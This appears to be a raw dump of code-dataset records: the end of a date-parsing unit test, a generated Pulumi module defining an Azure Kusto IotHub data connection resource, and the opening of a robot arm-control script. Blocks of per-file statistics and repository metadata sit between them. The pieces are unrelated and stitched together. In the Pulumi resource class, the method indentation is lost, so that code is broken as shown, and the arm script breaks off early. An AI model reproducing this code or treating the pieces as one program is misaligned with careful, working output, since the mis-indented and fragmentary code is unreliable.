self.assertEqual(result.start.get('year'), 2014)
self.assertEqual(result.start.date(), datetime(2014, 2, 24, 12))
self.assertEqual(result.end.get('day'), 2)
self.assertEqual(result.end.get('month'), 3)
self.assertEqual(result.end.get('year'), 2014)
self.assertEqual(result.end.date(), datetime(2014, 3, 2, 12))
def test_little_endian_with_time(self):
results = chrono.parse('Test : 2 Mar 2014 (10.00 - 11.00 AM)', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '2 Mar 2014 (10.00 - 11.00 AM)')
self.assertEqual(result.start.get('day'), 2)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2014)
self.assertEqual(result.start.date(), datetime(2014, 3, 2, 10))
self.assertEqual(result.end.get('day'), 2)
self.assertEqual(result.end.get('month'), 3)
self.assertEqual(result.end.get('year'), 2014)
self.assertEqual(result.end.date(), datetime(2014, 3, 2, 11))
def test_little_endian_with_imposible_date(self):
results = chrono.parse("32 August")
self.assertEquals(len(results), 0)
results = chrono.parse("32 August 2014");
self.assertEquals(len(results), 0);
results = chrono.parse("29 Feb 2014");
self.assertEquals(len(results), 0);
| 39.418919
| 91
| 0.6277
| 757
| 5,834
| 4.819022
| 0.076618
| 0.324836
| 0.402961
| 0.256579
| 0.945175
| 0.907346
| 0.855537
| 0.847862
| 0.790022
| 0.790022
| 0
| 0.086482
| 0.215118
| 5,834
| 147
| 92
| 39.687075
| 0.710199
| 0
| 0
| 0.610619
| 0
| 0
| 0.086904
| 0
| 0
| 0
| 0
| 0
| 0.725664
| 1
| 0.044248
| false
| 0.00885
| 0.026549
| 0
| 0.079646
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f7846e23f717820f4d56e21c04b05e74a933d02e
| 33,691
|
py
|
Python
|
sdk/python/pulumi_azure/kusto/iot_hub_data_connection.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/kusto/iot_hub_data_connection.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/kusto/iot_hub_data_connection.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['IotHubDataConnectionArgs', 'IotHubDataConnection']
# NOTE: generated by the Pulumi Terraform Bridge (tfgen) — do not hand-edit.
# Every @property below is a mechanical wrapper that proxies its snake_case
# key through pulumi.get / pulumi.set on the input-type storage.
@pulumi.input_type
class IotHubDataConnectionArgs:
    def __init__(__self__, *,
                 cluster_name: pulumi.Input[str],
                 consumer_group: pulumi.Input[str],
                 database_name: pulumi.Input[str],
                 iothub_id: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 shared_access_policy_name: pulumi.Input[str],
                 event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a IotHubDataConnection resource.
        :param pulumi.Input[str] cluster_name: Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
        :param pulumi.Input[str] consumer_group: Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
        :param pulumi.Input[str] database_name: Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
        :param pulumi.Input[str] iothub_id: Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] shared_access_policy_name: Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] event_system_properties: Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] location: The location where the Kusto Database should be created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "cluster_name", cluster_name)
        pulumi.set(__self__, "consumer_group", consumer_group)
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "iothub_id", iothub_id)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "shared_access_policy_name", shared_access_policy_name)
        # Optional inputs are only recorded when supplied, so an unset value
        # stays absent rather than being stored as an explicit None.
        if event_system_properties is not None:
            pulumi.set(__self__, "event_system_properties", event_system_properties)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> pulumi.Input[str]:
        """
        Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "cluster_name")

    @cluster_name.setter
    def cluster_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "cluster_name", value)

    @property
    @pulumi.getter(name="consumerGroup")
    def consumer_group(self) -> pulumi.Input[str]:
        """
        Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "consumer_group")

    @consumer_group.setter
    def consumer_group(self, value: pulumi.Input[str]):
        pulumi.set(self, "consumer_group", value)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter(name="iothubId")
    def iothub_id(self) -> pulumi.Input[str]:
        """
        Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "iothub_id")

    @iothub_id.setter
    def iothub_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "iothub_id", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="sharedAccessPolicyName")
    def shared_access_policy_name(self) -> pulumi.Input[str]:
        """
        Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "shared_access_policy_name")

    @shared_access_policy_name.setter
    def shared_access_policy_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "shared_access_policy_name", value)

    @property
    @pulumi.getter(name="eventSystemProperties")
    def event_system_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "event_system_properties")

    @event_system_properties.setter
    def event_system_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "event_system_properties", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        The location where the Kusto Database should be created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
# NOTE: generated by the Pulumi Terraform Bridge (tfgen) — do not hand-edit.
# State container used for get()/lookup flows; every field is Optional because
# any subset of properties may be supplied when filtering existing resources.
@pulumi.input_type
class _IotHubDataConnectionState:
    def __init__(__self__, *,
                 cluster_name: Optional[pulumi.Input[str]] = None,
                 consumer_group: Optional[pulumi.Input[str]] = None,
                 database_name: Optional[pulumi.Input[str]] = None,
                 event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 iothub_id: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 shared_access_policy_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering IotHubDataConnection resources.
        :param pulumi.Input[str] cluster_name: Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
        :param pulumi.Input[str] consumer_group: Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
        :param pulumi.Input[str] database_name: Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] event_system_properties: Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] iothub_id: Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
        :param pulumi.Input[str] location: The location where the Kusto Database should be created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] shared_access_policy_name: Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
        """
        # Only properties that were actually supplied are recorded; unset
        # fields stay absent from the state rather than being stored as None.
        if cluster_name is not None:
            pulumi.set(__self__, "cluster_name", cluster_name)
        if consumer_group is not None:
            pulumi.set(__self__, "consumer_group", consumer_group)
        if database_name is not None:
            pulumi.set(__self__, "database_name", database_name)
        if event_system_properties is not None:
            pulumi.set(__self__, "event_system_properties", event_system_properties)
        if iothub_id is not None:
            pulumi.set(__self__, "iothub_id", iothub_id)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if shared_access_policy_name is not None:
            pulumi.set(__self__, "shared_access_policy_name", shared_access_policy_name)

    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "cluster_name")

    @cluster_name.setter
    def cluster_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_name", value)

    @property
    @pulumi.getter(name="consumerGroup")
    def consumer_group(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "consumer_group")

    @consumer_group.setter
    def consumer_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "consumer_group", value)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter(name="eventSystemProperties")
    def event_system_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "event_system_properties")

    @event_system_properties.setter
    def event_system_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "event_system_properties", value)

    @property
    @pulumi.getter(name="iothubId")
    def iothub_id(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "iothub_id")

    @iothub_id.setter
    def iothub_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "iothub_id", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        The location where the Kusto Database should be created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="sharedAccessPolicyName")
    def shared_access_policy_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "shared_access_policy_name")

    @shared_access_policy_name.setter
    def shared_access_policy_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "shared_access_policy_name", value)
class IotHubDataConnection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
consumer_group: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
iothub_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shared_access_policy_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Kusto (also known as Azure Data Explorer) IotHub Data Connection
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_cluster = azure.kusto.Cluster("exampleCluster",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku=azure.kusto.ClusterSkuArgs(
name="Standard_D13_v2",
capacity=2,
))
example_database = azure.kusto.Database("exampleDatabase",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
cluster_name=example_cluster.name,
hot_cache_period="P7D",
soft_delete_period="P31D")
example_io_t_hub = azure.iot.IoTHub("exampleIoTHub",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
sku=azure.iot.IoTHubSkuArgs(
name="B1",
capacity=1,
))
example_shared_access_policy = azure.iot.SharedAccessPolicy("exampleSharedAccessPolicy",
resource_group_name=example_resource_group.name,
iothub_name=example_io_t_hub.name,
registry_read=True)
example_consumer_group = azure.iot.ConsumerGroup("exampleConsumerGroup",
resource_group_name=example_resource_group.name,
iothub_name=example_io_t_hub.name,
eventhub_endpoint_name="events")
example_iot_hub_data_connection = azure.kusto.IotHubDataConnection("exampleIotHubDataConnection",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
cluster_name=example_cluster.name,
database_name=example_database.name,
iothub_id=example_io_t_hub.id,
consumer_group=example_consumer_group.name,
shared_access_policy_name=example_shared_access_policy.name,
event_system_properties=[
"message-id",
"sequence-number",
"to",
])
```
## Import
Kusto IotHub Data Connections can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:kusto/iotHubDataConnection:IotHubDataConnection example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Kusto/Clusters/cluster1/Databases/database1/DataConnections/dataConnection1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_name: Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[str] consumer_group: Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] database_name: Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] event_system_properties: Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
:param pulumi.Input[str] iothub_id: Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: The location where the Kusto Database should be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] shared_access_policy_name: Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: IotHubDataConnectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Kusto (also known as Azure Data Explorer) IotHub Data Connection
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_cluster = azure.kusto.Cluster("exampleCluster",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku=azure.kusto.ClusterSkuArgs(
name="Standard_D13_v2",
capacity=2,
))
example_database = azure.kusto.Database("exampleDatabase",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
cluster_name=example_cluster.name,
hot_cache_period="P7D",
soft_delete_period="P31D")
example_io_t_hub = azure.iot.IoTHub("exampleIoTHub",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
sku=azure.iot.IoTHubSkuArgs(
name="B1",
capacity=1,
))
example_shared_access_policy = azure.iot.SharedAccessPolicy("exampleSharedAccessPolicy",
resource_group_name=example_resource_group.name,
iothub_name=example_io_t_hub.name,
registry_read=True)
example_consumer_group = azure.iot.ConsumerGroup("exampleConsumerGroup",
resource_group_name=example_resource_group.name,
iothub_name=example_io_t_hub.name,
eventhub_endpoint_name="events")
example_iot_hub_data_connection = azure.kusto.IotHubDataConnection("exampleIotHubDataConnection",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
cluster_name=example_cluster.name,
database_name=example_database.name,
iothub_id=example_io_t_hub.id,
consumer_group=example_consumer_group.name,
shared_access_policy_name=example_shared_access_policy.name,
event_system_properties=[
"message-id",
"sequence-number",
"to",
])
```
## Import
Kusto IotHub Data Connections can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:kusto/iotHubDataConnection:IotHubDataConnection example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Kusto/Clusters/cluster1/Databases/database1/DataConnections/dataConnection1
```
:param str resource_name: The name of the resource.
:param IotHubDataConnectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(IotHubDataConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
consumer_group: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
iothub_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shared_access_policy_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = IotHubDataConnectionArgs.__new__(IotHubDataConnectionArgs)
if cluster_name is None and not opts.urn:
raise TypeError("Missing required property 'cluster_name'")
__props__.__dict__["cluster_name"] = cluster_name
if consumer_group is None and not opts.urn:
raise TypeError("Missing required property 'consumer_group'")
__props__.__dict__["consumer_group"] = consumer_group
if database_name is None and not opts.urn:
raise TypeError("Missing required property 'database_name'")
__props__.__dict__["database_name"] = database_name
__props__.__dict__["event_system_properties"] = event_system_properties
if iothub_id is None and not opts.urn:
raise TypeError("Missing required property 'iothub_id'")
__props__.__dict__["iothub_id"] = iothub_id
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if shared_access_policy_name is None and not opts.urn:
raise TypeError("Missing required property 'shared_access_policy_name'")
__props__.__dict__["shared_access_policy_name"] = shared_access_policy_name
super(IotHubDataConnection, __self__).__init__(
'azure:kusto/iotHubDataConnection:IotHubDataConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
consumer_group: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
iothub_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shared_access_policy_name: Optional[pulumi.Input[str]] = None) -> 'IotHubDataConnection':
"""
Get an existing IotHubDataConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_name: Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[str] consumer_group: Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] database_name: Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] event_system_properties: Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
:param pulumi.Input[str] iothub_id: Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: The location where the Kusto Database should be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] shared_access_policy_name: Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _IotHubDataConnectionState.__new__(_IotHubDataConnectionState)
__props__.__dict__["cluster_name"] = cluster_name
__props__.__dict__["consumer_group"] = consumer_group
__props__.__dict__["database_name"] = database_name
__props__.__dict__["event_system_properties"] = event_system_properties
__props__.__dict__["iothub_id"] = iothub_id
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["shared_access_policy_name"] = shared_access_policy_name
return IotHubDataConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Output[str]:
    """
    Name of the Kusto Cluster this data connection is attached to. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "cluster_name")
    return value
@property
@pulumi.getter(name="consumerGroup")
def consumer_group(self) -> pulumi.Output[str]:
    """
    IotHub consumer group used by this data connection for ingestion. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "consumer_group")
    return value
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Output[str]:
    """
    Name of the Kusto Database this data connection is added to. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "database_name")
    return value
@property
@pulumi.getter(name="eventSystemProperties")
def event_system_properties(self) -> pulumi.Output[Optional[Sequence[str]]]:
    """
    System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "event_system_properties")
    return value
@property
@pulumi.getter(name="iothubId")
def iothub_id(self) -> pulumi.Output[str]:
    """
    Resource id of the IotHub this data connection ingests from. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "iothub_id")
    return value
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
    """
    Location where the Kusto Database is created. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "location")
    return value
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """
    Name of the Kusto IotHub Data Connection. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "name")
    return value
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
    """
    Resource Group where the Kusto Database exists. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "resource_group_name")
    return value
@property
@pulumi.getter(name="sharedAccessPolicyName")
def shared_access_policy_name(self) -> pulumi.Output[str]:
    """
    IotHub Shared Access Policy (must have read permission) used for ingestion. Changing this forces a new resource to be created.
    """
    value = pulumi.get(self, "shared_access_policy_name")
    return value
| 52.153251
| 256
| 0.683061
| 4,114
| 33,691
| 5.378707
| 0.056393
| 0.066612
| 0.075289
| 0.054094
| 0.91748
| 0.904646
| 0.895201
| 0.875452
| 0.864742
| 0.858957
| 0
| 0.003525
| 0.233653
| 33,691
| 645
| 257
| 52.234109
| 0.853519
| 0.452109
| 0
| 0.694444
| 1
| 0
| 0.120349
| 0.041508
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160494
| false
| 0.003086
| 0.015432
| 0
| 0.271605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f787a30d0d26df2b3eeed001487cdcfeea9cd5e0
| 44,533
|
py
|
Python
|
script/arm_control.py
|
amazon-picking-challenge/team_pfn
|
2f76524b067d816d8407f6c4fae4e6d33939c024
|
[
"Apache-2.0"
] | 7
|
2016-09-04T02:07:04.000Z
|
2017-05-25T02:31:07.000Z
|
script/arm_control.py
|
amazon-picking-challenge/team_pfn
|
2f76524b067d816d8407f6c4fae4e6d33939c024
|
[
"Apache-2.0"
] | null | null | null |
script/arm_control.py
|
amazon-picking-challenge/team_pfn
|
2f76524b067d816d8407f6c4fae4e6d33939c024
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2016 Preferred Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import rospy
from std_msgs.msg import String
from std_msgs.msg import Bool
from std_msgs.msg import Int16
from geometry_msgs.msg import Twist, Vector3, Point
from std_srvs.srv import Empty
import time
import random
import math
import roslib
import actionlib
from actionlib_msgs.msg import GoalStatus
from apc2016.msg import *
from apc2016.srv import *
import util
class LeftRight_arm:
    """Driver for one FANUC arm ('left' or 'right') via the move_arm_<lr> action.

    All poses are 6-vectors [x, y, z, w, p, r] -- presumably millimetres and
    degrees in the robot's global frame (TODO confirm against the arm driver).
    The shelf's 12 bins A..L are laid out on a 3-column x 4-row grid, so every
    preset family (photo/pre/front/...) is derived from its bin-A pose plus a
    column/row offset.
    """

    # Bins in grid order: index i has column i % 3 and row i // 3.
    _BIN_ORDER = "ABCDEFGHIJKL"

    def __init__(self, lr, w0=480, h0=360, with_vac=True):
        """Set up publishers, the preset-pose table and the move action client.

        lr: 'left' or 'right'.  w0/h0/with_vac are kept for interface
        compatibility (unused here).
        """
        rospy.loginfo("initialising %s arm" % lr)
        # Latched state topic ('workspace'/'safe') read by the other arm's logic.
        self.pub = rospy.Publisher(lr + '_state', String, queue_size=10, latch=True)
        # Calibration offset between calculated and tool coordinates:
        # calc_x: 494, -181, 913 / tool_x: 666, -29, 415
